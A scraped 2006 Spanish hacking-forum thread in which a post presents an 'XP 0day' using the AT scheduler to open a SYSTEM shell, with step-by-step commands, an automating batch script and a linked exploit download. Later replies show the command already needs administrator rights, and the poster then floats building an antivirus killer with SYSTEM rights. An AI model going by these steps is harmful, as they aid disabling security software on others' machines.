elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
08 Septiembre 2008, 12:46  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, zhyzura)
| | |-+  Elevación de Privilegios Local (de Administrador a System) en Windows XP
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Elevación de Privilegios Local (de Administrador a System) en Windows XP  (Leído 4268 veces)
||MadAntrax||
Lab Member
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1.452


This is the end, my only friend, the end...


Ver Perfil WWW
Elevación de Privilegios Local (de Administrador a System) en Windows XP
« en: 04 Agosto 2006, 23:10 »

0Elevación de privilegios local ( de Administrador a System) en Windows XP

Se ha encontrado un tremendo bug que permite un usuario con privilegios limitados iniciar sesión como NT AUTHORITY\SYSTEM (esta cuenta tiene más privilegios que un Administrador).

Cómo poner en práctica el 0day
1*- Ejecutamos una ventana de MS-DOS (el cmd.exe)
2*- Miramos la hora local del sistema, (suponemos que son las 23:05)
3*- Escribimos el siguiente comando:
Código:
at 23:06 /interactive "cmd.exe"
4*- Esperamos unos segundos y aparecerá una nueva ventana de MS-DOS.
5*- Cerramos la venata anterior, y en la nueva ventana ponemos el comando:
Código:
taskkill /F /IM explorer.exe
6*- Una vez finalizado el explorer antiguo escribimos en la ventana de MS-DOS: explorer.exe
7*- Se cargará un nuevo escritorio con permisos de SYSTEM, todo lo que ejecutemos apartir de ahora tendrá permisos de System.

Explicación del 0day
El bug reside en el comando AT.EXE que se utiliza para programar tareas, el caso que ese comando ejecuta las aplicaciones como SYSTEM, de esta manera podemos ejecutar el explorador de windows o una ventana de ms-dos con los privilegios elevados.

Yo mismo he codeado una simple aplicación para explotar la vulnerabilidad, ejecutar el programa y cuando los segundos vayan por 40 o 50 pulsamos el botón. Esperamos unos 10 segundos y tendremos el escritorio de System ;D

Fuente: bugtraq

http://ns2.elhacker.net/at_exploit.zip
« Última modificación: 06 Agosto 2006, 20:12 por ANELKAOS » En línea

MSN Kick 1.5 (100%)
Cactus Joiner 3.0 (65%)
Cactus Metamorph 0.2.1 (100%)
Cactus Downloader (45%)
Cactus Keylogger (30%)
Cactus Worm Generator (20%)

WarGhost
I love basket

Desconectado Desconectado

Mensajes: 916


TtEbAyO


Ver Perfil
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #1 en: 04 Agosto 2006, 23:25 »

Impresionante  :o :o :o :o.

Muy bueno .

P.D:voy a probarlo en algún ciber xDD.
En línea




[Prescott]
|Blue-Heart|
Colaborador

Desconectado Desconectado

Mensajes: 2.435


lll RTFM & STFW lll


Ver Perfil
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #2 en: 04 Agosto 2006, 23:34 »

Ya lo probé en mi maquina, funciona bien, solo que es a nivel local :)
En línea

-M.C.P.
-M.C.D.S.T

-iBook G4 14.1" white Mac OS X Leopard 10.5 @ 1.33 Ghz, 1,536 Gb de RAM, HD 80 Gb, iSight and Mighty Mouse Wireless


Hendriҳ
Colaborador

Desconectado Desconectado

Mensajes: 2.005


The Lord of his Middle Earth


Ver Perfil WWW
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #3 en: 04 Agosto 2006, 23:37 »

Ya lo probé en mi maquina, funciona bien, solo que es a nivel local :)

evidentemente...aunke si no estoy ekivokado se le podrian atribuir esto a kualkier PC de la LAN...si estays interesados os enseño komo se podria hacer....(si es que funciona...)

Salu2

En línea

Muchas veces las cosas no se le dan al que las merece más, sino al que sabe pedirlas con insistencia. - Arthur Schopenhauer

Isirius
Wiki

Conectado Conectado

Mensajes: 2.347


Ver Perfil WWW
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #4 en: 04 Agosto 2006, 23:39 »

Muy buena información como siempre ||MadAntrax||.
« Última modificación: 30 Julio 2007, 11:49 por Isirius » En línea

[Prescott]
|Blue-Heart|
Colaborador

Desconectado Desconectado

Mensajes: 2.435


lll RTFM & STFW lll


Ver Perfil
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #5 en: 04 Agosto 2006, 23:41 »

Mmm alguien me dice como lo regreso a su estado original, sin reiniciar? o forsozamente tengo que reiniciar?...
En línea

-M.C.P.
-M.C.D.S.T

-iBook G4 14.1" white Mac OS X Leopard 10.5 @ 1.33 Ghz, 1,536 Gb de RAM, HD 80 Gb, iSight and Mighty Mouse Wireless


||MadAntrax||
Lab Member
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1.452


This is the end, my only friend, the end...


Ver Perfil WWW
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #6 en: 04 Agosto 2006, 23:42 »

Es impresionante la verdad jejej solo que tengo un problema en el pc que quiero probarlo no puedo ni abrir bats ni abrir la consola que puedo hacer¿?¿? Alguna  idea gracias

Si, ejecuta el programa compilado que hay en mi primer mensaje y ya esta ;)

Mmm alguien me dice como lo regreso a su estado original, sin reiniciar? o forsozamente tengo que reiniciar?...

Cierra sesión con el comando: "logoff" e inicia luego tu sesión. Aunque recomiendo reiniciar, asi liberás el perfil de System de la memoria RAM de tu PC
« Última modificación: 04 Agosto 2006, 23:45 por ||MadAntrax|| » En línea

MSN Kick 1.5 (100%)
Cactus Joiner 3.0 (65%)
Cactus Metamorph 0.2.1 (100%)
Cactus Downloader (45%)
Cactus Keylogger (30%)
Cactus Worm Generator (20%)

Robokop

Desconectado Desconectado

Mensajes: 1.667



Ver Perfil
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #7 en: 04 Agosto 2006, 23:50 »

Buen aporte Gracias!!! lo probare.  :D
Eso me da ideas para programar
En línea

Isirius
Wiki

Conectado Conectado

Mensajes: 2.347


Ver Perfil WWW
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #8 en: 05 Agosto 2006, 00:10 »

||MadAntrax|| el problema es que no puedo abrir ni bat ni exe sin idetificar ni bajarlos al pc desde internet ni meterlos por cd o disquete jajaj entonces no hay nada que hacer veradd¿?
En línea

silverhack
Colaborador

Desconectado Desconectado

Mensajes: 1.743



Ver Perfil
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #9 en: 05 Agosto 2006, 01:13 »

Sólo quiero que me expliquéis una cosa porque o yo no me entero de como va la copla, o esto no funciona como explicáis...

Desde una cuenta bajo el grupo Usuarios el comando AT está restringido.. Imagen adjunta..



Desde una cuenta bajo el grupo Usuarios Avanzados el comando AT está restringido también... Imagen adjunta...



Desde una cuenta bajo el grupo Administradores lógicamente me deja crear una tarea programada..

Por favor, los más avanzados en hacking, explicádmelo...
En línea

No admitir corrección ni consejo sobre la propia obra es pedantería.

Jean de la Bruyere
sirdarckcat
sdc
CoAdmin
*****
Desconectado Desconectado

Mensajes: 4.523


HAND


Ver Perfil WWW
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #10 en: 05 Agosto 2006, 01:28 »

:P
hay una frase muy famosa:
"Its not a bug, its a feature"

solo puedes usar "AT" si eres administrador.. es decir.. no hay bug.

miren:

Código:
C:\Documents and Settings\Administrador>net user rbk /add
Se ha completado el comando correctamente.


C:\Documents and Settings\Administrador>net localgroup usuarios rbk /add
Error de sistema 1378.

El nombre de cuenta especificado ya es miembro del grupo local.


C:\Documents and Settings\Administrador>runas /user:rbk cmd.exe
Escribir contraseña para rbk:
Intentando iniciar "cmd.exe" como usuario "rbk"...

despues:

Código:
C:\WINDOWS\system32>at
Acceso denegado.

@MadAntrax:
lo probaste?

en fin.. si eres administrador, este batch hace todo automatico:
Código:
@echo off
set /A x=%TIME:~3,2%+1
at %TIME:~0,3%%x% /interactive "cmd.exe /K taskkill -f -im explorer.exe & explorer.exe"
« Última modificación: 05 Agosto 2006, 02:24 por Sdc » En línea

sch3m4
Colaborador

Desconectado Desconectado

Mensajes: 1.518

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #11 en: 05 Agosto 2006, 01:46 »

asi es, pero esto ya fue publicado en el foro, recuerdo haberlo leido
En línea


Primero te pasan por alto,despues te ridiculizan,luego luchan contra ti y,finalmente, tú ganas.


Proyecto Open Source - PExtractor v0.19b
silverhack
Colaborador

Desconectado Desconectado

Mensajes: 1.743



Ver Perfil
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #12 en: 05 Agosto 2006, 02:27 »

Citar
hay una frase muy famosa:
"Its not a bug, its a feature"

Citar
solo puedes usar "AT" si eres administrador.. es decir.. no hay bug.

Amén hermano... Muchas gracias por la aclaración  :D

P.D.- Si lo digo yo no me hubiesen creído por el rollito de colaborador de Windows..  :D
« Última modificación: 05 Agosto 2006, 02:28 por silverhack » En línea

No admitir corrección ni consejo sobre la propia obra es pedantería.

Jean de la Bruyere
sirdarckcat
sdc
CoAdmin
*****
Desconectado Desconectado

Mensajes: 4.523


HAND


Ver Perfil WWW
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #13 en: 05 Agosto 2006, 03:11 »

Tambien Windows tiene varias medidas de seguridad, para evitar la elevacion de privilegios con los programas del sistema.. como DefaultUser que se usa en situaciones anormales..

Miren, por ejemplo;
1.- Control+Alt+Suprimir
2.- [Windows] + U
3.- Ampliador => Iniciar
4.- [Alt]+[Espacio]
5.- Acerca del ampliador de windows.
6.- [Alt]+[Tab], hasta ubicarnos en "Seguridad de Windows"
7.- [Esc]
8.- Aparecera la ventana de acerca.de.
9.- Click en el link a la web de microsofot.
10.- Se abre una ventana del explorador.
11.- Archivo => Abrir

Pregunta:
¿En que contexto se esta ejecutando esa ventana?
"Default User"
que tiene los mismos privilegios que el usuario actual. :P

¿Porque no se ejecuta como system?
Si se estaba ejecutando como system, cuando pusiste [Control]+[Alt]+[Supr], DefaultUser es un Perfil dinamico, y depende de la sesion..

Código:
USERPROFILE=C:\Documents and Settings\Default User

Saludos!!
En línea

||MadAntrax||
Lab Member
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1.452


This is the end, my only friend, the end...


Ver Perfil WWW
Re: [+] 0day: Elevación de Privilegios Local en Windows XP
« Respuesta #14 en: 05 Agosto 2006, 06:42 »

Pues si, el bug (o feature) solo funciona bajo cuenta de administrador, pero eso no le quita importacia, por ejemplo: Haces un programa que se de privilegios de SYSTEM y poder finalizar procesos y servicios que un Administrador no puede (por ejemplo el nod32 o similares). Se podria programar u bonito y potente AV-Killer.

En C:\Windows\Tasks se crean archivos *.job con las tareas, voy a probar si puedo crearme un JOB para ejecutar el cmd como SYSTEM y copiarlo a mano desde una cuenta de usuario (no lo he probado, pero a lo mejor funciona). Si consigo algo os aviso, gracias ;)
En línea

MSN Kick 1.5 (100%)
Cactus Joiner 3.0 (65%)
Cactus Metamorph 0.2.1 (100%)
Cactus Downloader (45%)
Cactus Keylogger (30%)
Cactus Worm Generator (20%)

Páginas: [1] 2 Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC